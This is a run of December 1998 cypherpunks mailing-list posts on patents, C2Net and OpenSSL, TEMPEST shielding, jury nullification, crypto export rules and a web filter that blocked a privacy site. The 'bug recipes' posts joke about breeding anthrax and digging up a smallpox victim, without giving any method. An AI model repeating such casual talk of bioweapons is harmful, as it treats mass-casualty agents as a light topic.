thanks to some high paid lawyer.

2. patents are meant for "inventions", not ideas.  Ideas are getting
patented everyday.  I know of many.  Why do I consider them ideas and
not inventions?  Because the patented "thing" isn't available.  There is
a description of how it will work, what it will do and how someone could
build it, in a million different ways, if they could figure out the tiny
details themselves, since that is the part missing.  But can you go
anywhere and touch the invention, or see it operate or use it in some
manner, however preliminary?  No.

I still have the folder that E*Data sent me four or more years ago,
stating:  We would rather license than litigate.  Here is a list of
companies we've sued.  You'd look through the paperwork and everything
was spelled out except what you would get from them if you licensed
their patent, other than permission.  You remember E-Data?  Where are
they now?  Well they had a big blow a few months ago to their silly
patent.

All in all, I don't think patents help the small inventor any more.
Those who can afford it, tell a lawyer what they are thinking and in
60-90 days, the attorney will have filed a patent with no more than a
few follow-up phone calls or faxes.  Those who can't afford it will
continue to be robbed of their inventions.

My rant.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Dec 1998 11:29:13 +0800
To: cypherpunks@cyberpass.net
Subject: Merry Christmas from <Somewhere>
Message-ID: <v04020a25b2a75b895816@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Now, *this* is curious...

Anyone, especially from C2NET, wanna take a shot at the following?

I think I can tell him what CTO means ;-), but what about the rest?

Cheers,
RAH
--- begin forwarded text


From: Somebody
To: <rah@philodox.com>
Subject: Merry Christmas from <Somewhere>
Date: <would actually tell you where they were...>
Status: U

Dear Rob Hettinga 
 
Merry Christmas and a happy new year! 
Hi, my name is <Somebody>
I hope you remember me from FC98. 
 
I am trying to find out what is happening with C2net.
I heard a rumor that C2net had corporate restructuring and Sameer quit
CEO and became CTO.  What is CTO anyway?
Also, there was a rumor that someone who was in charge of the development
of the SSL
in Australia quit working for C2net.
Does this have to do with Sameer's announcement of the OpenSSL project? 
I really need to know this.  Please reply to my e-mail if you know anything
about it.
Thank you. 
 
<Somebody's .sig>
 


--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 24 Dec 1998 12:04:31 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: Question about 'TEMPEST': UPS
In-Reply-To: <3681858B.4028@lsil.com>
Message-ID: <199812240342.WAA20762@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



For a new type of RF shielding consider "Flectron"
a metallized fabric that allegedly shields up to 100db. 
Originally developed by Monsanto it has recently been 
bought by Advanced Performance Materials (which 
also makes a range of EMI-related products):

   http://www.apm-emi.com/

Another company, BEMA, Inc. offers portable enclosures
made mostly of Flectron for TEMPEST protection, with
RF-protected doors, vents, and electrical and cable
connections. One is a walk-in, 6 x 6 x 7, weighs 125 lbs.
and fits in two suitcases for transport. And there's a desktop 
version. These are reportedly in use by NSA, other TLAs, 
the military and corporations. There's a brief description at:

   http://www.martykaiser.com/bema1.htm

The market in TEMPEST-related products is rapidly
growing. Check AltaVista under that term or, say,
NSA 65-6 and MIL-STD-285. There's more material
appearing all the time as the word gets out on the
need for RF-protection. 

We've heard from manufacturers that the demand for 
their shielding products is increasing for medical purposes 
-- some related to those dreaded signals being received 
by teeth and brain. Flectron clothing and bed shrouding 
are in the works.

To be sure, Joel McNamara's TEMPEST Web site remains 
the best of all unclassified sources:

   http://www.eskimo.com/~joelm/tempest.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Thu, 24 Dec 1998 15:56:06 +0800
To: cypherpunks@Algebra.COM
Subject: Re: bug recipes
Message-ID: <0c21a12a18cbe07b583b092c04c69544@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>..someone describes the use of mutton for anthrax >breeding..
>
>The mils are already vaccinated, so anthrax is >passe.  What you *really* want to do is dig up a >smallpox victim...

The only Mils vaccinated are the ones going into saudi and bosnia and other High-threat area's. They will not be fully vac'ed for another 3-5 years. 
As far as smallpox...I'd just as soon that shit NEVER get dug up. I somehow doubt a skeleton could harbor usable smallpox but I am not up on my biology tonight.
 --Skrill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Dec 1998 07:34:51 +0800
To: gbroiles@netbox.com
Subject: Re: Jury Duty
Message-ID: <199812232303.AAA23676@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Greg Broiles writes:

>If you really do want to avoid jury service, mentioning FIJA or jury
>nullification ought to do the trick - it may get every juror within
>earshot excused, too, depending on how paranoid the locals are. 
>
>But I think that's a horrible idea - jury participation is an opportunity
>to exercise much more influence than you wield if/when you vote in an
>election. All by yourself, voting your conscience as shaped by the
>evidence and the jury instructions, you can force a mistrial, which might
>or might not mean the end of the case. If your view of the evidence and
>your understanding of the law, as explained by the judge in the jury
>instructions, proves to be persuasive to your fellow jurors, you will
>collectively make the law as it applies to the parties in your trial. It's
>pretty difficult to overturn a jury verdict - not impossible, but it's
>harder than you might think from watching TV.

Be aware that concealing your opinions on this matter can get you into
hot water.  Juror Laura Kriho was convicted of obstruction of justice
for not revealing that she believed in jury nullification, during the
selection process.  Kriho has appealed.  More information is at
http://home.utah-inter.net/don-tiggre/jrp.krihotoc.htm.

The judge's ruling, at http://www.eagle-access.net/index3.html:

:} After reviewing all the evidence and the law, and applying the standard
:} of proof beyond a reasonable doubt, the Court reaches the following
:} conclusions.  During the jury selection process Ms. Kriho was aware that
:} the trial court and the lawyers felt it was a juror's duty to follow the
:} law as given by the trial court, and they wanted to know if any juror
:} disagreed with this proposition. Ms. Kriho was also aware that the trial
:} court and the parties wanted to know if the jurors could follow the rule
:} that punishment was not to enter into their deliberations. Ms. Kriho
:} was also aware that the trial court and the parties wanted to know if
:} the jurors could follow the rule that punishment was not to enter into
:} their deliberations. Ms. Kriho was also aware that the trial court and
:} the parties wanted to know if any juror had strong feelings concerning
:} the enforcement of drug laws or any experience that would affect their
:} attitude about drug laws. While being aware of the importance of these
:} issues and having been given the opportunity to comment on these issues,
:} Ms. Kriho deliberately withheld her opinions on these topics from the
:} trial court and the parties during the jury selection process. Based on
:} all the evidence, this Court concludes that it was Ms. Kriho's intent to
:} withhold this information from the trial court and the parties so that
:} she could be selected to serve on the jury and obstruct the judicial
:} process. By deliberately withholding this information, she obstructed
:} the process of selecting a fair and impartial jury. The selection of
:} jurors who have open minds and who have not preconceived the verdict
:} is essential for a fair trial. Ms. Kriho's lack of candor about her
:} experiences and attitudes led to the selection of a jury doomed to
:} mistrial from the start. This Court finds this conduct constitutes
:} obstruction of justice and this conduct was offensive to the authority
:} and dignity of the trial court.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "uhm, yeah.." <hrmmmmmmmmmm@hotmail.com>
Date: Thu, 24 Dec 1998 16:41:01 +0800
To: nobody@replay.com
Subject: Re: bug recipes
Message-ID: <19981224081650.17846.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>..someone describes the use of mutton for anthrax breeding..
>

What?

>The mils are already vaccinated, so anthrax is passe.  What
>you *really* want to do is dig up a smallpox victim...
>

You must have a lot of time on your hands, eh?

>

- neotek



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Wed, 23 Dec 1998 22:31:41 +0800
To: cypherpunks@cyberpass.net
Subject: New synonym for GAK
Message-ID: <91441354017946@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



Another one to add to the list:
 
>U.S. approves export of crypto product without key recovery
>      
>EE Times       
>(12/22/98, 4:13 p.m. EDT)
>                         
>RICHARDSON, Texas. Network security specialists ODS Networks Inc. has won 
>government approval to export its strong encryption products to companies in 
>42 countries without a government-backed key recovery feature.        
>                
>ODS said it is the first U.S. company to receive a blanket export license 
>from the Department of Commerce to ship its crypto product. The government 
>strictly controls the export of encryption products with a key-recovery 
>feature and key lengths of 112, 128 or 1,024 bits.
>              
>The ODS products use an alternate "stream recovery" feature that allows users 
>to protect encrypted data. The company said its stream recovery scheme helps 
>resolve conflicting requirements for privacy and monitoring.
>          
>ODS said its objective was to introduce a monitoring capability that protects 
>the rights of innocent third parties in criminal investigations.
 
Their PR which was sent to several crypto mailing lists earlier today was 
conveniently cut off just before the GAK paragraph (and in any case they 
weren't lying, just being economical with the truth).
 
Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bernies <email_tool@yahoo.com>
Date: Thu, 24 Dec 1998 18:29:51 +0800
To: <cypherpunks@toad.com>
Subject: We pay you to host our banner
Message-ID: <419.436153.74761794email_tool@yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain



You got this email because you address have added into our database by 
you or someone. If you don't want to got this email any more, simply send 
a blank email with REMOVE at subject to us.

Thanks because reading this mail, now you can earn one dollar ($ 1.00 ) just hold a banner at you site.
If someone fill out a form form you web site and you will get $1.00. Very simple and easy.

For more information or you want to join us, pls email to us at email_tool@yahoo.com or 
burnerutm@hotmail.com iwth subject headline :BANNER HOLDER

Thanks
Bernies




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Dec 1998 12:35:00 +0800
To: cypherpunks@toad.com
Subject: bug recipes
Message-ID: <199812240402.FAA17735@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



..someone describes the use of mutton for anthrax breeding..

The mils are already vaccinated, so anthrax is passe.  What
you *really* want to do is dig up a smallpox victim...








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Dec 1998 12:37:57 +0800
To: cypherpunks@toad.com
Subject: ruskies on crypto
Message-ID: <199812240413.FAA18580@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.jmls.edu/cyber/docs/ruscrypt.html
DECREE OF THE PRESIDENT OF THE RUSSIAN FEDERATION

Concerning legal matters in the area of development, production, sale and
usage of encoding devices, and also for the assignment of responsibility
concerning the encoding of information



http://www.emoney.ru/eng/about/our_publications.htm
Our publications
"What is "Digital Money" A.I.Demidov, C.V.Preobrazhensky. "Planet
Internet", 1997, July, Russian. 
"Cryptography basics" A.I.Demidov. "Internet World" #7(10), 1997, July.
Russian. 
"Internet commerce" A.I.Demidov. "Itogi" (JV with "Newsweek") #24(57),
1997, June. Russian. 
"The main types of Internet payment systems" A.I.Demidov "Internet World"
#6(9), 1997, June. Russian. 
"Digital Cash" A.I.Demidov. "CardWorld" #8, 1997, May. Russian. 
"Information site: www.emoney.ru" C.V.Preobrazhensky. ROCIT workshop
"Electronic commerce and Internet payment systems", 1997, April. Russian. 
"Ways of Internet payment systems development in Russia" A.I.Demidov. ROCIT
workshop "Electronic commerce and Internet payment systems", 1997, April.
Russian. 
"What is digital money?" A.I.Demidov. "Money" #8(116), 1997, March. Russian. 



http://www.fortunecity.com/skyscraper/coding/379/lesson1.htm
CLASSICAL CRYPTOGRAPHY COURSE







  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Thu, 24 Dec 1998 21:52:04 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: Question about 'TEMPEST': UPS
In-Reply-To: <3681858B.4028@lsil.com>
Message-ID: <36823E24.99771ACE@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





John Young wrote:

>  We've heard from manufacturers that the demand for
> their shielding products is increasing for medical purposes
> -- some related to those dreaded signals being received
> by teeth and brain. Flectron clothing and bed shrouding
> are in the works.

Something akin to the mosquito netting draped over beds in the tropics?
I live in a mountain valley. Once mined for iron ore, compasses are
unreliable here. TV reception was limited to watching the ant races.
Radio was squelchy and drift prone. Signals could not bore through the
mountain's heart of iron. The voices went away. The sky was a vacuum,
pressure was relieved.

But lately rf has been falling from the sky, the heavy signal moisture
causes fungi, slate-grey disks, to sprout from the roofs and sides of
homes. The conditions have caused a fungal bloom. Spores rain down into
the valley, collide, bounce and ricochet into a storm.

The disease pressure is high. My head's a sensurround, Imax theater of
voices and images that never fucking stop. Surely some protective
prophylaxis is called for, maybe something as cheap as a plastic grocery
bag, but this is no guaranty. Coffins manufactured to the highest
Tempest standard may attenuate the signal strength enough to prevent
reanimation of the corpses. Bodies are sealed in composite fiber
radomes, designed to reflect and absorb the offensive radiation.  Some
choose incineration to escape the influx, mixing incinerate with
powdered ferrite to achieve some measure of final rest.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Thu, 24 Dec 1998 07:34:30 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <03e63d7f660781fa4c3b078108512b13@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Navy ordinace personnel always to have a keen sense of irony
and, therefore, a fine sense of humor.

On Cohen.  Well, he affirms his belief in his coic.  What else
needs to be said?  This press statement does sound like Algore though.
Maybe the two have been spending too much time together or drinking
from the same fruit bowl. ;)

anon y. mous




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Thu, 24 Dec 1998 23:13:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Is Sameer/C2net Attempting to subvert the OpenSSL and Mod-ssl projects
In-Reply-To: <e7da8d968f05e9013ee1302f84dfadfd@anonymous>
Message-ID: <199812241350.IAA017.59@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <e7da8d968f05e9013ee1302f84dfadfd@anonymous>, on 12/24/98 
   at 05:25 PM, Anonymous <nobody@nowhere.to> said:

>To: cypherpunks@cyberpass.net
>cc:
>Subject: OpenSSL and C2Nets attempted subversion of same(Sameers track
>record --------
>On the Subject of Sameers record with open source

>  mod_ssl.c(this was the component that Sameer wishes wasnt
>available(and did his best to deny to his customers) and indeed was quite
>sucessful in preventing its availability until Ralf Engleschall's mod_ssl
>becam available... This is the REAL reason C2net took a nose dive...) and
>now it appears Sameer is trying to co-opt that project also.

>I trust Ben Laurie and Ralf... They developed the code .

>I DONT trust Sameer... he is simply a privateer, he takes sources and
>trys to restrict availability so he can make a profit from Intellectual
>Property NOT developed by him...
>I specifically suspect his announcement coming on the heels of Ben's. I
>dont think this person will ever get a clue about either Open Source or
>GPL.


I must have missed this one. Could anyone provide some greater detail on
what the mod_ssl.c issue was with Sameer & C2Net?


FWIW I have a couple of projects that I am working on that are dependent
on the SSLeay Libs. If I don't like the way Sameer or C2Net is going with
this I will just continue my own development on the Libs.

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Dec 1998 23:51:53 +0800
To: cypherpunks@cyberpass.net
Subject: SCC's SmartFilter Bans Crypto/Privacy Website(s) as Naughty, not Nice?
Message-ID: <v04020a2cb2a7f7fb77c5@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Thu, 24 Dec 1998 03:59:49 -0500
To: cryptography@C2.net
From: Vin McLellan <vin@shore.net>
Subject: SCC's SmartFilter Bans Crypto/Privacy Website(s) as Naughty, not
 Nice?
Sender: owner-coderpunks@toad.com

	This is an amazing story!  Security Computing Corporation
<http://www.scc.com> sells a content filter ("SmartFilter") which is used
to restrict web access from within corporations and other organizations.

	Lauren Weinstein, the moderator of the widely respected Privacy
Forum, a mailing list and website on the Internet at
<http://www.vortex.com>, recently reported that for over a year (see the
attached post) corporate employees at sites which use SCC's SmartFilter
have typically been restricted from accessing the Privacy Forum website or
archives because the Privacy Forum's occasional discussion of cryptography.

	These discussions -- no code, all high-level discussions of civil
and ethical values, policy, and crypto politics -- were apparently enough
to define the Privacy Forum website as a repository of "criminal skill."

	Some SCC corporate customers, according to Weinstein, had
explicitly asked for crypto resource sites on the web to be defined as
off-limits. It is still unclear how those requests (one from the corporate
site which brought the matter to Weinstein's attention) resulted in SCC
staff labelling the Privacy Forum website -- along with, one must presume,
many _many_ others --  as a repository of criminal skills.  (Other sites
which fall into this SmartFilter category include, for example, websites
which make available information about what ingredients can be used to make
a bomb. Shades of Wassenaar and ITAR.)

	What is amazing, of course, is that Secure Computing is one of the
more sophisticated  vendors in computer security. There are a lot of smart
people at SCC who will doubtless cringe when they hear this story.

	It may, in fact, seem hilarious to some of them that SCC's website
evaluation staff (and the web filters they use to express and embody their
judgements) could categorize a privacy site as "criminal" just because it
archives discussions of cryptography and crypto politics. Some of the best
of those discussions, for instance, may have involved SCC employees like
cryptographer Rick Smith;-)

	What is _really_ sad is that -- when Weinstein complained that a
website categorized as offering "criminal skills" by SCC's SmartFilter
staff may, with no recourse, suffer irrepreparable harm -- the best and
most daring response SCC could come up with was to promise to set up a
website at which organizations and commercial entities could query the SCC
database to see how SCC's website evaluators labelled them.

	(This, of course, presumes these organizations hear about SCC's
Smartfilter product.... It also presumes that representatives of those
agencies, firms, or organizations feel compelled to inquire to see if SCC's
professional moralists labelled them in some similarly eccentric category.)

	Not exactly clear on the concept, those clever SmartFilter folk.

	Frankly, not in a million years would anyone outside of the bowels
of the Hoover Building consider crypto savvy (or an obsession with privacy)
as inherently "criminal."  Not yet anyway.

	I do hope that SCC has sold a few thousand copies of SmartFilter
which  routinely block corporate employee access to some feisty, litigious,
and well-networked civil libertarian groups like the ACLU, EPIC, CDT, or PI
as repositories of Criminal Skills.  Oh, yes indeed!

	In fact, if the Privacy Forum was labelled as "criminal" because of
an ocassional discussion of crypto, does it make sense that the websites of
SDTI/RSA,  Entrust, IBM, MS, Netscape, et al, eluded the ban and some
similar label? Inquiring Minds wanna to know.

	The SmartFilter has been awarded "certification" by the
International Computer Security Association's testing labs:
<http://www.icsa.net>. The SmartFilter data sheet is at:
http://www.securecomputing.com/P_Tool_SF_Docs.html and there is a white
paper at: http://www.securecomputing.com/sfwhitep.pdf
SCC provides SmartFilter access controls adapted for both Unix and Windows
NT, as well as for the Microsoft Proxy Server, the Netscape Proxy Server,
several firewalls, the CSM Proxy Server, the NetCache Proxy Server, and the
Squid Proxy Server.

	Feliz Navidad,

		_Vin

------- original message -----------------

> From:	privacy@vortex.com [SMTP:privacy@vortex.com]
> Sent:	Sunday, December 20, 1998 4:58 PM
> To:	PRIVACY-Forum-List@vortex.com
> Subject:	PRIVACY Forum Digest V07 #21
>
> PRIVACY Forum Digest      Sunday, 20 December 1998      Volume 07 : Issue
> 21
>
[...]
>
> Date:    Wed, 16 Dec 98 12:25 PST
> From:    lauren@vortex.com (Lauren Weinstein; PRIVACY Forum Moderator)
> Subject: Privacy Discussions Classified as a "Criminal Skill"
>
> Greetings.  Is discussing privacy in the PRIVACY Forum a criminal skill?
> According to one widely used commercial web filtering tool, the answer was
> yes!  The controversy over software to block access to particular sites,
> based on perceived content, has been continuing to rage.  Attempts to
> mandate the use of such software in environments such as libraries and
> schools have raised a variety of serious concerns.  In addition to fairly
> straightforward freedom of speech issues, another factor revolves around
> how accurate (or inaccurate) these filtering systems really are.
>
> I've now seen firsthand that errors by a filtering system can indeed be quite
> serious, an event that seems to certainly validate some of these concerns.
> But there is something of a silver lining to the story, as we'll see
> later.
>
> I recently was contacted by someone at a large corporation, who was trying
> to reach the PRIVACY Forum web site, which is constantly being referenced by
> individuals and commercial, educational, government, and other sites around
> the world.  This person was upset since whenever they attempted to reach
> the http://www.vortex.com site and domain that hosts the PRIVACY Forum,
> their web software blocked them, informing them that the block was in place
> due to the site being categorized as containing "criminal skills."
>
> As the webmaster for the vortex.com domain, this certainly came as news to
> me.  The message they received didn't give additional information--they
> didn't even know exactly where it came from.  It was apparent though, that
> the entire organization was probably blocked from reaching the PRIVACY
> Forum, since the filtering software in question was affecting a main
> firewall system.
>
> After a number of phone calls and discussions with the system administrator
> for that organization, the details began to emerge.  The company was running
> a filtering software package from Secure Computing Corporation of San Jose,
> California.  This package received weekly updates of blocked sites in a wide
> variety of categories, one of which was "criminal skills."
>
> The administrator had no idea what rationale was used for these decisions,
> they just pulled in the list each week and applied it.  He immediately placed
> vortex.com on a local exception list so that it would no longer be blocked to
> their users.
>
> I then turned my attention to Secure Computing.  After a number of calls, I
> found myself speaking with Ken Montgomery, director of corporate
> communications for that firm.  He confirmed the information I had already
> received.  The filtering product in question ("SmartFilter") was apparently
> not being marketed to individuals, rather, it was sold to institutions,
> corporations, etc. to enforce filtering policies across entire entities.
> The product covers a wide range of information categories that users of the
> software can choose to block.  He said that the majority of blocked sites
> were in categories involving pornography, where there was (in his opinion)
> no question of their not belonging there.
>
> The "criminal skills" category reportedly was broadly defined to cover
> information that might be "of use" to criminals (e.g. how to build bombs).
> He had no explanation as to why my domain had been placed in that list,
> since by no stretch could any materials that are or have ever been
> there fall into such a categorization.  He did discover that the
> classification of my domain had occurred over a year ago (meaning
> other sites could have been receiving similar blocking messages for
> that period of time when trying to access the PRIVACY Forum) and
> that the parties who had made the original classification were no longer
> with their firm--so there was no way to ask them for their rationale.
> (All of their classifications are apparently made by people, not
> by an automated system.)
>
> However, it seems likely that the mere mentioning of encryption may have
> been enough to trigger the classification.  The administrator at the
> organization that had originally contacted me about the blocked access, told
> me that the main reason they included the "criminal skills" category in
> their site blocking list was to try prevent their users from downloading
> "unapproved" encryption software.  This was a type of information that he
> believed to be included under the Secure Computing "criminal skills"
> category (the "logic" being, obviously, that since criminals can use
> encryption to further their efforts, encryption is a criminal skill).  He
> also admitted that he knew that their users could still easily obtain
> whatever encryption software they wanted anyway, but he had to enforce the
> company policy to include that category in their blocking list.
>
> As PRIVACY Forum readers may know, no encryption software is or ever has
> been distributed from here.  The topic of encryption issues does certainly
> come up from time to time, as would be expected.  For the mere *mention* of
> encryption in a discussion forum to trigger such a negative categorization
> would seem to suggest the fallacy of blindly trusting such classification
> efforts.
>
> Mr. Montgomery of Secure Computing initially suggested that it was up to
> their customers to decide which categories they wanted to use in their own
> blocking lists -- he also stated that as a company they were opposed to
> mandatory filtering regulations.  I suggested that such determinations by
> their customers were meaningless if the quality of the entries in those
> categories could not be trusted and if errors of this severity could so
> easily be made.  I felt that this was particularly true of a category with
> an obviously derogatory nature such as "criminal skills"--the ramifications
> of being incorrectly placed into such a category, and then to not even
> *know* about it for an extended period of time, could be extreme and very
> serious.
>
> To their credit, my argument apparently triggered a serious discussion
> within Secure Computing about these issues.  I had numerous subsequent
> e-mail and some additional phone contacts with Mr. Montgomery and others
> in their firm concerning these matters.  First off, they apologized
> for the miscategorization of vortex.com, and removed it from the
> "criminal skills" category (it was apparently never listed in any
> other of their categories).
>
> Secondly, they have agreed with my concerns about the dangers of such
> miscategorizations occurring without any mechanism being present for sites
> to learn of such problems or having a way to deal with them.  So, they will
> shortly be announcing a web-based method for sites to interrogate the Secure
> Computing database to determine which categories (if any) they've been
> listed under, and will provide a means for sites to complain if they feel
> that they have been misclassified.  They've also suggested that their hope
> is to provide a rapid turnaround on consideration of such complaints.
>
> While by no means perfect, this is a step forward.  I would prefer a more
> active notification system, where sites would be notified directly when
> categorizations are made.  This would avoid their having to
> check to see whether or not they've been listed, and needing to keep
> checking back to watch for any changes or new categorizations.  If more
> filtering software companies adopt the Secure Computing approach, there
> would be a lot of checking for sites to do if they wanted to stay on
> top of these matters.  Secure Computing feels that such notifications are
> not practical at this time.  However, their move to provide some
> accountability to their filtering classifications is certainly preferable
> to
> the filtering systems which continue to provide no such facilities and
> operate in a completely closed environment.
>
> So, we make a little progress.  The PRIVACY Forum and vortex.com are no
> longer miscategorized and have been removed from all Secure Computing block
> lists.  Secure Computing was polite and responsive in their
> communications with me, and will establish the system discussed above in
> reaction to my concerns.  Web filtering of course remains a highly
> controversial topic with many serious negative aspects, but we see that when
> it comes to dealing with the complex issues involved, it would be a mistake
> to assume that all such filters all created equal.
>
> --Lauren--
> Lauren Weinstein
> Moderator, PRIVACY Forum
> http://www.vortex.com
>
[...]

-----
"Cryptography is like literacy in the Dark Ages. Infinitely potent, for
good and ill... yet basically an intellectual construct, an idea, which by
its nature will resist efforts to restrict it to bureaucrats and others who
deem only themselves worthy of such Privilege."
_ A Thinking Man's Creed for Crypto  _vbm.

 *     Vin McLellan + The Privacy Guild + <vin@shore.net>    *
      53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick Feisthammel <pafei@rubin.ch>
Date: Thu, 24 Dec 1998 16:25:18 +0800
To: Alex Alten <Alten@home.com>
Subject: Re: mysterious PGP release-signing keys
In-Reply-To: <3.0.3.32.19981223195440.00b29970@mail>
Message-ID: <Pine.LNX.3.96.981224085732.28869A-100000@dns.h.rubin.ch>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hi Alex!

> This is yet another a good example of why one should never confuse using PK 
> certificates with security.  An email PGP signature looks impressive but in
> practice it is useless.

It is usefull iff you can verify the validity of the used PK certificate.
That's what the web of trust in PGP is for.

Cheers,
Patrick

- ---
PGP-KeyID: DD934139 (pafei@rubin.ch)    encrypt mail with PGP if possible
more about PGP on http://www.rubin.ch/pgp/ (english and german)
what ist the web of trust? see http://www.rubin.ch/pgp/weboftrust.en.html
Das Vertrauensnetz von PGP:    http://www.rubin.ch/pgp/weboftrust.de.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQESAwUBNoH0kpVgYabdk0E5AQHENgfjBRrYXjTfvo6NMbx/ktK23yeiKibeTfSZ
lbjZCdT+Vp433IAAtz4EHgC1vbSHaA04CdvPrX2cTYqeJAP7RQzGgbZVg7P9p23C
rFYoPtLdCXEiH9GDG48TuqFTUBvJrLMIZXIoSS/ZhMQMASim9zDF/gLQP0/VGicc
QwCjwogFed+R0uvoleZh0YhhEnkIKkLDM4a9pDcLKi9uryspeD6VrWevegmJpzXM
aSQBlpMuTdOXcmaThEqgblP7YeAzK8Q4IdT2oNsCpUx4DntzX/bJ5fOKYjRLdy10
4ctSlXOqYOWZmjVnF4lRFDmI1dwfX0hf7uHTBRG6lh913hAIVg==
=ktwt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Fri, 25 Dec 1998 02:34:01 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I want to spam the Jury Duty information
Message-ID: <199812241809.KAA15486@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
 
> I think about putting up about $200 or so (whetever a decent spamming 
> will cost me) and spam the internet with the information about jurors
> rights and jury nullification.
> 
> Anyone thinks that it is a good idea?

No, it's a bad idea.  The ends do not justify the means.

-- 
Eric Murray          N*Able Technologies                    www.nabletech.com
(email:  ericm  at the sites lne.com or nabletech.com)     PGP keyid:E03F65E5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Dec 1998 17:44:25 +0800
To: cypherpunks@cyberpass.net
Subject: Ping
Message-ID: <199812240922.KAA04877@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



TEST
TEST
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~
TEST    
TEST
~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 25 Dec 1998 00:43:05 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Suggested reading
Message-ID: <199812241629.KAA00465@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



The Iron Cavalry
Ralph Zumbro
ISBN 0-671-01390-4
$6.99 US

Note especialy the last chapter, "Puma Force".


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
